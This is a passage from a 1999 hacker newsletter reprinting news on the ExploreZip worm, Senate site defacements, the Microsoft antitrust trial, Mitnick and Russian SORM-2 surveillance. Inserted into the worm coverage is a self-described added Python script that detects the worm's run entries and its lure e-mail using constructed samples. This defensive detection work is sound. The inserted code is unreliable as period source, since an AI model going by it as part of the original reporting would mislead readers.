Partly, that's our fault, because we accept products from hardware and software vendors which in any other industry would be considered too unreliable, unstable and under-tested to be released onto the market. We believe the vendors when they excuse themselves by telling us it's all too complicated to explain, it's the nature of the medium and so forth. That's appalling, but as long as we lack the collective spine to demand better, we're stuck with what we get.

But it's hard to see how we can obliterate the virus problem, since a computer is a sitting duck for viruses because of the way in which we use them - sharing disks, transferring files, going on and off the Net and downloading things from places we don't know. Few people take even basic precautions against viruses and so these things spread. In addition, many people never bother to make backups of their work, and thus are twice devastated if struck by a virus or another form of computer attack. And even if the anti-virus software makers come up with a fix to one virus, some hacker is always brewing another that we cannot yet imagine.
In the days that it takes to create an antidote, thousands or millions can be hit. In the case of particularly nasty viruses, entire companies can be brought down at the cost to the global economy of billions of pounds.

So what's a poor computer user to do? There's not much else to recommend but to proceed with caution, which means educating yourself on how to keep your own machine as clean as possible by being vigilant against viruses and other forms of computer attack. Buy a good virus-scanning software package and use it. Be wary about what you download off the Net and scan it first. Don't open e-mail with attachments unless you know the sender (and even then, be cautious about all attachments).

And create backups. Anyone who has ever lost irreplaceable, important files off a floppy disk or hard-drive knows the excruciating pain of that particular experience. You may still have to clean up a computer if a virus brings it down - and that's not a pleasant task - but having your files intact somewhere else at least keeps the misery from reaching bottomless depths.

[SBX] A detector for the Backdoor-G virus is online at www.nai.com

@HWA

29.0 MS Antitrust Trial Looks at Security
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 11th 1999

From HNN http://www.hackernews.com/

contributed by m4in

District Court Judge Thomas Jackson has asked a government expert witness whether removing the browser from Windows will increase or diminish its security. Analysts think that the judge is wondering what the repercussions are of including the browser with the operating system.

C|Net
http://www.news.com/News/Item/0,4,37649,00.htm

Wired
http://www.wired.com/news/news/politics/story/20139.html

C|Net's link seems to have died, here's the Wired story:

Will Curiosity Kill the Browser?
by Declan McCullagh
12:15 p.m. 10.Jun.99.PDT

WASHINGTON -- On the last day of the government's case, the federal judge overseeing the Microsoft antitrust trial asked Thursday if including a browser with Windows could weaken a computer's security.

"Are there any security issues involved in the choice of a browser [that may increase] the risk of penetration by a virus or something like that?" US District Judge Thomas Penfield Jackson asked a witness testifying for the government.

Read ongoing US v. Microsoft coverage

Edward Felten, a Princeton University scientist, said that some security-conscious network administrators may prefer to have no browsers on computers. Felten was the last witness called by the government, and Microsoft will call its rebuttal witnesses starting Monday.

"Is there any way of absolutely assuring security?" Jackson asked. He also wondered which browsers are safer than others.

Reading the portents in a judge's questions is, of course, a perilous task. Some wags in the press gallery suggested that His Honor must be shopping for a computer. Or was the technology-impaired Jackson simply confused?

But the theory, if true, that would be most damaging to Microsoft goes like this: Jackson is wondering what the downsides are to Microsoft's decision to include Internet Explorer with Windows.

This became an important question since a decision last summer by an appeals court, which unceremoniously overturned Jackson's December 1997 decision on a related Justice v. Microsoft case. In a 2-1 decision, the panel said judges should be "deferential to entrepreneurs' product design choices" and companies should be free to integrate products as they see fit -- so long as the improvements benefit customers.

Jackson's comments could mean that he plans to weigh whether or not Microsoft's decision to integrate Internet Explorer with Windows was, on the whole, a good thing for the general public.
Other government witnesses earlier in the trial have offered additional reasons why welding IE into the operating system reduces consumer choice.

Microsoft has claimed that including IE produces a more useful product with Internet functionality that third-party software developers can rely on. Jim Allchin, a Microsoft vice president, testified that these features "simply cannot be achieved through the use of add-on products from third parties."

But Felten said there was no reason Internet Explorer had to be shipped with the operating system. "Microsoft can deliver a version of Windows 98 from which the Internet Explorer browser has been removed and deliver it in such a way that does not affect the non-Web browsing functions of Windows 98," he said.

The Justice Department pointed to a January 1997 email message from Allchin to Bill Gates that said another executive wanted Win98 "minus IE 4.0 in June.... IE 4.0 can be added next year."

Felten claimed he had designed a program that removes browsing capability from Windows 98. But Microsoft had Felten demonstrate it and showed him he had not actually removed Web browsing features.

The trial will continue on Monday when Microsoft calls AOL's David Colburn as a hostile witness. Microsoft said it will challenge the credibility of Colburn, an AOL executive who was a government witness earlier.

@HWA

30.0 Web Defacements Hindering Open Government
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 11th 1999

From HNN http://www.hackernews.com/

contributed by Code Kid

Eric Lundquist claims that web page defacements hold back the development of a web-accessible government and that penalties for such actions should be proportional to the damage caused. Getting people to vote or file taxes online is difficult if government web sites can't keep the intruders out.
MSNBC
http://www.msnbc.com/news/278369.asp

Hacking is no longer merely a prank

COMMENTARY: Hacking retards the growth of a Web-accessible government and should hold penalties proportional to the crime

By Eric Lundquist, PC Week
ZDNN

June 9 — Getting your site hacked used to be simply an embarrassment. Your carefully designed home page suddenly became a billboard for lewdness, racism or whatever the hacker desired to create. However, now — and more so in the future — a hacked site is a public indication that you are not ready to play in the digital age. Companies and government organizations are now realizing this, and hackers who protest that a hack is a prank are finding that a prank can result in a bunch of FBI agents coming through the front door.

IN THIS DIGITAL AGE, your company — whether it be an Amazon, E-Trade or some idea still forming — is built on a brand, a process and an information infrastructure. The way your site appears on the Web; the process by which a Web visitor can maneuver and buy products; and the ability of your site to scale, connect to suppliers and customers, and securely maintain a digital relation will determine your success.

Sites that scale and allow you to shop comfortably in a digital store can quickly extend their brands from books to auctions to pet foods and beyond. Sites that crumble while you and the rest of the panicked investment community try to bail out on a stock will find themselves abandoned and facing a new realm of legal liabilities. Hacked sites visibly and fundamentally shake the faith in the brand and the products being offered at the digital storefront.

This loss of faith in the brand carries over to and is magnified in the government realm. Internet access is on the verge of becoming sufficiently ubiquitous to allow organizational functions to move to the Web.
If the first big thing the Web allowed was personal access and community building from the ground up, the next big thing is allowing existing organizations to use the Web to assume previously cumbersome functions. Vote on the Web? Sure. Register your car via the Web. File your taxes. Get your refund. All these functions are certainly possible. What is missing is trust.

Trust is a difficult dimension to describe, but it most clearly is apparent in its absence. Don’t ask a citizenry to register to vote via the Web if the government’s top legal agencies can’t keep their home pages free from graffiti. And it is the trust that is shaken when the White House site is hacked. Or the FBI site. Or the Senate site.

Hacking is more than breaking a few minor laws. Hacking is certainly not just being a good digital citizen by showing the security gaps that now exist to prevent more serious transgressions in the future. Hacking is neither clever nor funny, nor something to be tossed off as adolescent humor from sci-fi-addled minds. Hacking retards the growth of a Web-accessible government and should hold penalties proportional to the crime.

31.0 Worm.ExploreZip Continues its Rampage
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 14th 1999

From HNN http://www.hackernews.com/

contributed by nvirB

After forcing some companies to completely shut down their networks and keeping some administrators at work all weekend, people are bracing for Worm.ExploreZip to resurface with a vengeance today as employees return to work. While Worm.ExploreZip has the fast-spreading capabilities of Melissa, it also contains a very destructive payload that can delete files. IT administrators are bracing for the expected onslaught of inevitable mutations.
MSNBC
http://www.msnbc.com/news/278660.asp

Nando Times
http://www.techserver.com/story/body/0,1634,59360-94597-674149-0,00.html

C|Net
http://www.news.com/News/Item/0,4,37697,00.html?st.ne.fd.tohhed.ni

FBI and NIPC On the Hunt

The FBI is hot on the trail looking for the creator of Worm.ExploreZip. This is probably more of a PR stunt than anything. The odds of them actually finding whoever created this are slim to none.

ZD Net
HTTP://www.zdnet.com/zdtv/cybercrime/viruswatch/story/0,3700,2274493,00.html

Wired
http://www.wired.com/news/news/technology/story/20168.html

Mac Vulnerable Too

Symantec Utilities is claiming that if a Mac user runs Windows emulation software, names files with .doc, .ppt, .xls, etc..., and either checks his mail under emulation or is on a mixed environment network, it is possible to contract this worm. (Ed Note: Any Mac user who is running this brain dead setup deserves to be infected.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2274574,00.html

C|Net;

How the email worm works
By Stephen Shankland
Staff Writer, CNET News.com
June 10, 1999, 6:15 p.m. PT

The Worm.ExploreZip virus, while different in some functional details from the Melissa virus that hit in March, takes advantage of a similar vulnerability: The fact that so many people now routinely use email.

The new virus emerged this week, spreading from user to user by taking advantage of automation features available to users of Microsoft email software on Windows machines. Like Melissa, it requires some active participation of the victim: opening the malicious file, or "payload," attached to the email message. And again like Melissa, the malicious program then modifies the victim's computer system to send more copies of itself automatically by email. (See CNET Topic Center on antivirus software.)
To encourage a person to open the attachment, both malicious programs use a similar ploy: Trick the victim into thinking he or she has just received a useful document from a trusted source. Both programs can get away with this, because the infected email comes from a person likely to be known by the recipient.

But there the differences end. Where Melissa was relatively benign to users, Worm.ExploreZip deletes Microsoft Word, Excel, and Powerpoint document files, said Wes Wasson, head of security products marketing at Network Associates.

Where Melissa tapped into address books set up in Microsoft Outlook, Worm.ExploreZip's modus operandi is just to bounce back incoming email automatically with a response including the malicious program, Wasson said. That means Worm.ExploreZip will spread more slowly, he said. "How fast it spreads correlates to how many emails you get," he said. Melissa, on the other hand, sent itself to 50 entries in the address book, and those entries themselves could each be mailing lists.

Regardless of their propagation rate, both viruses depend on automated email features. Worm.ExploreZip basically uses a modified version of the same feature that allows a person on vacation to set up email software to automatically reply with a "try back later" message, Wasson said.

The advent of email as a distribution mechanism has allowed a new class of viruses, Wasson said. In the old days, viruses had to be smaller, but Worm.ExploreZip is comparatively huge at more than 200 kilobytes, he said. "Now with email, I don't have to be slim like I was before," Wasson said. "Viruses and worms can be written in [the programming language] C. This is really cutting-edge science."

The increasing power of email viruses means that sophisticated hackers who once looked down on viruses now see them as powerful tools to obtain information stored on target computers, particularly because using email makes it easier to obscure the origin of the attack, he said.
"The hacker believes the virus is going to be more of a stealth approach," he said. Selling security Antivirus software sellers profit from virus scares. Sales of antivirus software jumped 67 percent in the week the Melissa virus hit, according to market research firm PC Data. Network Associates' Wasson acknowledges the sales boost, but insists his company is out there to help people, pointing as evidence to the company's free, virus clinic detection services available over the Internet. "Rather than hold [people] hostage and take advantage of an incident, we'll give it to them for free," he said. Network Associates' competitor TrendMicro offers a similar service. As more companies begin to become more wary of the risks posed by the Internet, Network Associates is offering more security consulting services. For example, the company hires itself out to find vulnerabilities in computer systems, Wasson said. "Customers come to us all the time, saying check my security out, bang on my firewall," he said, referring to the protective software designed to keep computer networks safe from unauthorized access. In addition, the company is offering new software next month called CyberCop Sting that not only sets off alarms when there's a burglar, but also lets companies set up decoy systems to lure intruders and record information about them, Wasson said. The strategy is similar to the technique described by author Clifford Stoll in his book, The Cuckoo's Egg: Tracking a Spy Through the Maze of Computer Espionage. -=- FBI investigating email worm By Tim Clark Staff Writer, CNET News.com June 11, 1999, 3:00 p.m. PT update In the wake of yesterday's attack by the virulent Worm.ExploreZip virus, the FBI said it is investigating the case as a possible crime. "As was the case with Melissa, the transmission of a virus can be a criminal matter, and the FBI is investigating," said Michael Vatis, director of the National Infrastructure Protection Center (NPIC). 
Vatis said the worm has the potential of doing significant damage to private sector and government computer systems.

"It is critical for computer users to be aware of and take the well-publicized steps to protect against and mitigate potential damage caused by malicious code," he said in a statement released this afternoon. He added that transmission of malicious code can be a federal criminal offense and that the FBI is "aggressively investigating" the matter.

The National Infrastructure Protection Center is monitoring developments and coordinating field office investigations, he said, urging victims of the virus to contact the FBI field office nearest them, or the NIPC Watch and Warning Unit, which can be reached by email at nipc.watch@fbi.gov.

"Because of the destructive payload delivered by this virus, its potential impact is significant," Vatis said. "All email users should exercise caution when reading their email for the next few days and bring unusual messages to the attention of their system administrator."

After the Melissa virus outbreak that began March 26, the FBI joined other agencies to identify and track down whoever had created, then spread the virus. On April 1, a 30-year-old New Jersey man, David L. Smith, was arrested by federal and state officials and charged in the case. He has pleaded not guilty and his case is still pending.

-=-

Data virus forces email shutdowns
By Kim Girard
Staff Writer, CNET News.com
June 10, 1999, 7:10 p.m. PT

update Corporations are scrambling to cope with a new data-destroying virus that is forcing the shutdown of email systems nationwide.

The virus, first reported to the Symantec Antivirus Research Center on Sunday by five companies in Israel, is called Worm.ExploreZip or Troj_Explore.Zip. The worm uses Mail Application Programming Interface (MAPI) commands and Microsoft Outlook on Windows systems to propagate itself, Symantec said.
In some ways, the virus is the sequel to the Melissa virus, which spread with unprecedented speed in March. Worm.ExploreZip spreads from computer to computer by taking advantage of automation features available to people using Microsoft email software on Windows machines. Although the new virus doesn't spread as fast as Melissa, it causes more damage, according to antivirus experts, deleting Microsoft Word, Excel, and Powerpoint document files, among others.

Several firms have shut down their email systems entirely while IS staff root out the virus, according to Symantec.

Boeing was hit particularly hard. The Seattle-based aerospace giant shut down its email system, which is used by at least 150,000 employees, at 2:30 p.m. today, a company spokesman said. The company was still assessing the damage caused by the virus, but the spokesman, who asked not to be named, said he knew of at least one employee whose entire hard drive was wiped out.

"As soon as we became aware of it, we told everyone, and we put a message up on our internal Web site," he said. Late in the day the email still had not been restored. The company hopes to have it back up by tomorrow.

PricewaterhouseCoopers took down its entire email system, used by 45,000 U.S. employees, also at 2:30 p.m. in response to the virus. The company was just bringing up parts of the system at 7 p.m., a company spokesman said, but he didn't know how much damage had been done or how many workers had been affected.

Some companies said they disarmed the virus--actually a software "worm"--before it could cause many problems. Microsoft, for example, disconnected its email servers from the Internet at about 9 a.m. so that programmers could work on an antidote, company spokesman Dan Leach said. The servers were up and running two hours later, he added.
Employees of antivirus software maker Symantec report that they have received email that includes the worm, which arrives as an attachment to the missives. Companies such as General Electric and Southern Company have had files deleted by the virus, according to Bloomberg.

Virus protection firm Trend Micro spokeswoman Susan Orbuch said earlier today that the company had received 107 calls from customers concerning the virus. Thirteen of those calls came from those already infected, she said. Orbuch said that Trend Micro knew of five large companies that had been infected, as well as several public relations firms and a magazine. She declined to name the companies.

Nate Meyer, spokesman for Credit Suisse First Boston, said the virus had struck the company's offices in New York, San Francisco, and Palo Alto, California, and that other offices worldwide may have been affected. He said he did not know how many of the company's computers were infected.

Meyer said Credit Suisse's technology department had been working on the problem for much of the day and had sent out a warning about it this morning. But he said the virus did not seem to have slowed the company's operations, adding that it had not disrupted the investment company's stock trading. Meyer noted that his own email had been working throughout the day.

Quick repairs

Representatives at AT&T and Intel reported that they were able to quickly repair their systems after being hit by the virus. "These are things that we have to do because of the communications reality that we live in today," an AT&T spokeswoman said.

The virus disrupted work at Cambridge, Massachusetts-based industry analyst firm Forrester Research, where Internet access, including email, was cut off. Another analyst firm, Current Analysis, sent email to customers warning them not to open any email attachments coming from the firm with the .exe extension because an employee's PC had been infected.
The infected email may contain the message: "Hi [recipient name]! I received your email and I shall send you a reply ASAP. Till then, take a look at the attached zipped docs. bye."

Unlike the Melissa virus, which harvested from a user's address book, the new virus raids an email in-box when executed through Microsoft Exchange or Outlook. The worm attaches itself as a file called zip_files.exe and is sent off with a return email. Although the virus isn't expected to spread as quickly and to as many computers as Melissa did, it does destroy files.

"It's an .exe file posing as a Zip file," said Eric Chien, senior researcher at the Symantec Antivirus Research Center.

The worm is particularly insidious because it searches through hard drives and destroys files with extensions of .doc, .xls, .ppt, .c, .cpp, .h, or .asm, he said. Chien said that means whoever wrote the virus was targeting corporations--seeking to destroy developers' source code, as well as documents created using Microsoft Office applications, such as Word and Excel.

"It singles out those files and destroys them," he said. "This hits the local drive and the file server."

Extent of damage not known

Chien said it is unclear how much damage the virus has done. "We've received multiple reports from major corporations in the U.S.," he said. "What we're hoping is that the initial jump on this Sunday night will prevent it from spreading."

Panda Software said it has added free downloads for the detection and disinfection of the virus--which it called "extremely dangerous"--on its Web site. The company also urged people to update antivirus software.

Esther Shin, a public relations specialist at Aventail, a Seattle-based business-to-business e-commerce firm, said two of her colleagues encountered the virus this morning. One of them lost all the files on his hard drive after he opened the attachment, she added.
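The lure e-mail quoted above and the persistence entries listed in the removal notes in section 31.1 below, as an added example that is not part of the CNET or MSNBC text and not Network Associates' or Symantec's code: a Python check that parses a WIN.INI fragment, a REGEDIT4-style export of the NT key named in those notes, and an RFC 822 message, and flags the explore.exe run entry and the canned-reply-plus-executable pattern. The sample inputs are constructed, the [windows] section as the home of WIN.INI's run= line is an assumption of mine (the notes name only the line), and any .exe attachment is listed separately so the copycat warning at the end of 31.1 can be acted on without an exact name match.

```python
import email
import re
from email import policy

# Indicators drawn from the reports above.  Assumption not stated in the
# removal notes: WIN.INI keeps run= in its [windows] section.
WIN_INI_SECTION = "windows"
WORM_BINARY = "explore.exe"
REG_KEY = r"hkey_current_user\software\microsoft\windows nt\currentversion\windows"
LURE_RE = re.compile(r"I received your email and I shall send you a reply ASAP", re.I)
LURE_ATTACHMENT = "zip_files.exe"

# Constructed samples, not real captures: a Win9x WIN.INI fragment, a
# REGEDIT4-style export of the NT key, the worm's reply and a normal reply.
SAMPLE_WIN_INI = r"""
[windows]
load=
run=c:\windows\system\explore.exe
[Desktop]
Wallpaper=(None)
"""
SAMPLE_REG_EXPORT = r"""
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"run"="C:\\WINNT\\System32\\Explore.exe"
"""
SAMPLE_LURE = """\
From: colleague@example.com
Subject: Re: your mail
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Hi Alice!
I received your email and I shall send you a reply ASAP.
Till then, take a look at the attached zipped docs.
bye.
--b1
Content-Type: application/octet-stream; name="zip_files.exe"
Content-Disposition: attachment; filename="zip_files.exe"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--b1--
"""
SAMPLE_CLEAN = "From: bob@example.com\nSubject: Re: lunch\nContent-Type: text/plain\n\nSee you at noon.\n"


def _unquote(s):
    # .reg exports quote names/values and double their backslashes; WIN.INI does neither.
    s = s.strip()
    if len(s) >= 2 and s[0] == s[-1] == '"':
        s = s[1:-1].replace("\\\\", "\\")
    return s


def parse_ini(text):
    """Tiny INI/REGEDIT4 parser -> {section: {key: value}}, names lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][_unquote(key).lower()] = _unquote(value)
    return sections


def _basename(path):
    return path.strip().replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _run_hit(text, section):
    # The run entry is a value inside the section/key, so match on its file name only.
    run = parse_ini(text).get(section, {}).get("run")
    return run if run and _basename(run) == WORM_BINARY else None


def win_ini_run_hit(text):
    """run= value from WIN.INI's [windows] section if it launches explore.exe, else None."""
    return _run_hit(text, WIN_INI_SECTION)


def registry_run_hit(reg_export):
    """Same check against a REGEDIT4 export of the NT key named in the removal notes."""
    return _run_hit(reg_export, REG_KEY)


def lure_indicators(raw_message):
    """Check one RFC 822 message for the canned reply text and executable attachments."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body is not None else ""
    names = [(p.get_filename() or "").lower() for p in msg.iter_attachments()]
    return {
        "lure_text": bool(LURE_RE.search(text)),
        "exe_attachments": [n for n in names if n.endswith(".exe")],
        "known_name": LURE_ATTACHMENT in names,
    }


def is_explorezip_lure(raw_message):
    """True for the reply text plus an .exe attachment, whatever it is called."""
    ind = lure_indicators(raw_message)
    return ind["lure_text"] and (ind["known_name"] or bool(ind["exe_attachments"]))
```

Run the checks against a copied WIN.INI, an exported .reg file, and the raw source of a suspicious reply pulled from the Sent Messages folder the notes tell you to look at; a hit on either run entry plus outbound replies carrying zip_files.exe is the combination the removal steps are written for.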
The email was worded to make the recipient believe that the message came from a Microsoft employee, she said. Shin said she got a similar email but didn't open the attachment. "When I got hit I called all my contacts," she said.

Bloomberg and News.com's Troy Wolverton, Dan Goodin, and Tim Clark contributed to this report.

-=-

31.1 Removal of the Worm.ExploreZip virus (from MSNBC insert)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HOW TO GET RID OF IT

If your computer is infected, security software company Network Associates recommends these steps to remove it:

- If you’re running Windows 95 or 98: Restart your computer in MS-DOS mode, edit the WIN.INI file and remove the line run=c:\windows\system\explore.exe. Then delete the file c:\windows\system\explore.exe and restart Windows.

- If you’re running Windows NT: Run REGEDIT (not REGEDT32), locate the key [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows] and remove the following value from it (the value, not the whole key): run=C:\\WINNT\\System32\\Explore.exe
  Restart Windows NT, then remove the file c:\winnt\system32\Explore.exe

- If you’re unsure whether you’ve been infected, Network Associates recommends that you look in your My Documents folder to see whether you’re missing any familiar files, or look in the Sent Messages folder in your e-mail client to see if you are sending replies with attachments that you do not remember sending.

Network Associates’ Gullotto warned that if this worm follows the pattern of recent malicious attachments, network administrators and users should be alert to e-mails that are suspicious but do not match exactly the characteristics of Worm.ExploreZip. Variants and copycats of malicious software often appear soon after the original.

@HWA

32.0 Senate web site hacked again(!)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 14th 1999

From HNN http://www.hackernews.com/

Senate Web Site Attacked, Again!
contributed by FedWatcher

For the second time in almost as many weeks the official web site of the US Senate has been defaced. A group known as The Varna Hacking Group from Bulgaria claimed responsibility. (Mirror provided by attrition.org)

Wired
http://www.wired.com/news/news/politics/story/20180.html
MSNBC
http://www.msnbc.com/news/279233.asp
AP via Yahoo
http://dailynews.yahoo.com/headlines/ap/technology/story.html?s=v/ap/19990611/tc/senate_hackers_1.html
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html

Wired;

US Senate Cracked Again
by Polly Sprenger
4:30 p.m. 11.Jun.99.PDT

For the second time in two weeks, crackers on Friday defaced the Web page of the US Senate.

The official Senate Web site was down as of Friday afternoon while administrators repaired and restored the network. A cracker replaced the official page with one that said "free Kevin Mitnick, free Zyklon."

An employee of US Senate Technical Operations said the site went down around 4 p.m. EST, but couldn't say when the site might come back up.

"Those of us who haven't been hacked yet are just trying to lay low and beef up security as we can," said Sean Donelan, a network engineer for Data Research Associates, a nationwide Internet service provider that works with state governments, libraries, and schools.

Donelan said that each government agency is having to reinforce security independently and that outside vendors working with the government departments consider their security solutions proprietary.

"[We] are also trying not to attract attention and not waving a red flag challenging anyone to 'test' our security," Donelan said.

The Senate home page was previously cracked on 27 May. In that incident, crackers filled the page with comments critical of the FBI. That hack was claimed by the group Masters of Downloading, who broadcast the message "MAST3RZ 0F D0WNL0ADING, GL0B4L D0MIN8T10N '99!" on the Senate's site.
The Varna Hacking Group claimed responsibility for the latest Web vandalism. The organization claims it is a "noncommercial hacking group." Varna is based in Bulgaria, according to reports of a 1998 attack that members claimed to have launched against the Cartoon Network.

Zyklon, mentioned in Friday's incident, is alleged to be a 19-year-old hacker from Shoreline, Washington. He was indicted in early May for his alleged involvement in other government site hacks.

Many of the recent hacks demanded justice for imprisoned cracker Kevin Mitnick, who has been in jail for more than four years awaiting trial on a broad swath of criminal charges.

@HWA

33.0 Mitnick Sentencing Hearing Rescheduled
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 14th 1999

From HNN http://www.hackernews.com/

contributed by Macki

This weekend Judge Pfaelzer granted Kevin Mitnick's defense a continuance, postponing tomorrow's previously scheduled sentencing hearing until July 12th. This will give the defense time to verify the damage claims, which may be upwards of $80 million. Although it is not known for sure, some people have speculated that the recent demonstrations (including a recent LA Times article on them) may have influenced Judge Pfaelzer to grant this request. She refused to hear a similar motion just days before the demonstrations. It is interesting to note that July 12th is the Monday after Defcon.

FREE KEVIN
http://www.kevinmitnick.com/home.html
Letters Claiming Damage Amounts
http://www.hackernews.com/orig/letters.html

34.0 Russia Looks to Beef Up its Version of Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 14th 1999

From HNN http://www.hackernews.com/

contributed by Merlock

Russia has recently leaked a story concerning its version of Echelon (the North American spy network system) called SORM (System for Operational-Investigative Activities). SORM has been in place for over a year now, but a new development has civil rights leaders in Russia scared. "SORM-2" will require all Russian ISPs to install black-box recording devices at their POPs at the ISP's expense!!! Russian web users have exclaimed that they have been spied on for years, only now they are going to have to pay for it.

ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/russiansonline990612.html

Russians Fight for Net Privacy
Christopher Hamilton
Special to ABCNEWS.com

S T . P E T E R S B U R G , June 11 — In Russia, the Internet and free are words not necessarily found in the same sentence.

Russian Internet users continue to struggle against a state security system mired in Soviet-era attitudes toward the free flow of information. The latest outrage: a ministerial act put forward by the Federal Security Service (FSB in its Russian acronym), the successor to the KGB. The act would boost the ability of law enforcement to monitor citizens’ Internet activities.

The new act represents an addendum to an existing regulation called SORM — the Russian acronym for System for Operational-Investigative Activities. Currently awaiting approval from the Russian Ministry of Justice, SORM-2 would require Internet service providers to install at their own expense FSB-provided “black boxes” plus a hotline to the FSB. The devices would enable the FSB to monitor and record all electronic communications.

Because SORM-2 is a regulation, it requires only approval from the Ministry of Justice, not review by Parliament or President Yeltsin. Existing law already affords the state security apparatus plentiful eavesdropping possibilities once a warrant is issued. SORM-2 would expand those capabilities, making full electronic surveillance as easy as a mouse click for the FSB.

‘Steps Toward Totalitarianism’

News of SORM-2 was leaked late last year on the Moscow Libertarium, a digital-freedom Web site sponsored by the Institute for Commercial Engineering in Moscow.

“SORM-2 is a step toward removing the checks and balances between public and the state,” says Anatoly Levenchuk, who operates the Libertarium site. “First they will start investigations without warrants. Then they will decide who is guilty without a trial…These are steps toward totalitarianism.”

“The FSB is used to collecting dossiers on citizens just in case,” said Yuri Vdovin of Citizen’s Watch, a St. Petersburg-based human rights organization. “They have been spying on us for years, but now I am going to have to pay for it.”

Russian ISPs have already begun to feel the chill. Bayard-Slavia Communications, a Volgograd-based ISP that has repeatedly refused to provide information to the FSB without a warrant, was disconnected from its network provider in mid-May. The state communications agency, Goskomsvyaz, cited “improper formulation” of the company’s contract with the provider, Moscow-Teleport. Company director Nail Murzhanov has assembled a team of prominent activists and lawyers in St. Petersburg and vows to take the matter to court.

Eugene Prygoff of Kuban Net, based in Krasnodar, also reports FSB pressure. “Things here in the provinces aren’t like in Moscow and Petersburg. They come and ask for full access to our clients’ e-mail. Sure, we ask for a court order and an explanation, but they have power in the structures that own the ISDN line, so we have to comply.”

Turning to Encryption

Hoping to prevent invasions of their privacy, many Russian Internet users are turning to encryption. According to Maksim Otstavnov, who maintains the Russian Web site for the encryption program PGP, or Pretty Good Privacy, hits increased about 10-fold after news of SORM-2 was leaked to the public last year.

But the official status of cryptography in Russia remains unclear. In 1995, Yeltsin banned the use of PGP and other forms of encryption unless it is licensed and registered with FAPSI, the Russian equivalent of the U.S. National Security Agency. Whether his decree legally applies to private citizens is a matter of debate.

The murky state of the law and the lack of public disclosure leaves citizens uninformed about laws that affect them. Citizen’s Watch has held numerous seminars on issues surrounding SORM and computer privacy. “We need to educate people and get them involved,” said Vdovin.

Vdovin and Citizen’s Watch are drafting proposals for the State Duma, Russia’s lower house of Parliament, to create a system of checks and balances to rein in the FSB’s domestic spying activities.

Meanwhile the shadowy struggle between the security agency and Internet service providers continues. According to Anatoly Levenchuk, “The FSB is already trying to establish ‘volunteer’ agreements similar to SORM-2 with providers. ISPs failing to comply face pressure tactics ranging from repeated visits from tax police to building inspectors threatening to shut them down.”

In Russia, the state has always fought for access to its citizens’ private communications, while citizens have fought back as best they could. The battle over Internet privacy could determine who’s winning this ongoing struggle.

35.0 Company Claims CyberAttack by Competitor
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 14th 1999

From HNN http://www.hackernews.com/

contributed by Seraphic Artifex

Lenox Healthcare Inc. is claiming that its competitor Vencor Inc. engaged in "dead of night computer hacking" according to a lawsuit filed in Los Angeles County Superior Court in California. These actions are allegedly in retaliation for Lenox's cooperation with a government investigation of Vencor. The lawsuit claims, among other things, that Vencor broke into Lenox Healthcare's computer system to prevent Lenox from processing medical bills. (It will be interesting to see if these claims can be proven in court.)
The Berkshire Eagle
http://search.newschoice.com/nebe/eagleheadlines/99-06-08_clarkesues08a1.asp

Lenox Healthcare suing major nursing home firm
Tuesday June 08, 1999
By Ellen G. Lahr
Berkshire Eagle Staff

PITTSFIELD -- Lenox Healthcare Inc. is suing one of the biggest U.S. nursing home companies, Vencor Inc., for engaging in extortion, death threats and "dead of night" computer hacking, allegedly in retaliation for Lenox's cooperation with a government investigation of Vencor.

Vencor Inc., a publicly traded company with more than 300 nursing homes and 60 hospitals around the country, carried out "oppressive, unlawful and often maniacal actions" against Lenox Healthcare, according to a lawsuit filed in Los Angeles County Superior Court in California.

The lawsuit also accuses a Vencor company lawyer of "threatening to appear at [Lenox Healthcare's] office with a gun and 'blow away' " Lenox Healthcare President Thomas M. Clarke if Clarke didn't make certain payments to Vencor.

Efforts to gain comment from Vencor and its California attorney were unsuccessful yesterday. Both Clarke and his lawyer also declined to comment.

$28 million deal

Vencor and Lenox Healthcare have been locked in a web of contracts since Lenox Healthcare purchased or leased 30 of Vencor's facilities in 1996 in a $28 million business deal. About half of the facilities purchased or leased are concentrated in California.

The lawsuit states that Vencor reneged on millions of dollars allegedly owed to Lenox Healthcare, and fraudulently compelled Clarke to pay $8.7 million for a California nursing facility that was worth far less.

Vencor is teetering on the edge of bankruptcy because of an array of regulatory and financial problems, according to financial reports and the company's own annual report.

The case also claims that:

- After the 1996 business deal was completed, Vencor received millions of dollars in Medicare and Medicaid payments that should have gone to Lenox Healthcare. Vencor eventually turned over some $4 million to Lenox, but has retained nearly $1 million more.

- Vencor allegedly broke into Lenox Healthcare's computer system to prevent Lenox Healthcare from processing medical bills, "thereby allowing Vencor to capitalize on the resulting interim financial crisis by extorting" money from Lenox Healthcare.

- Vencor allegedly tried to cut off Lenox Healthcare's receipt of pharmaceutical supplies and therapy services "as a means of extorting further monies" from Lenox Healthcare.

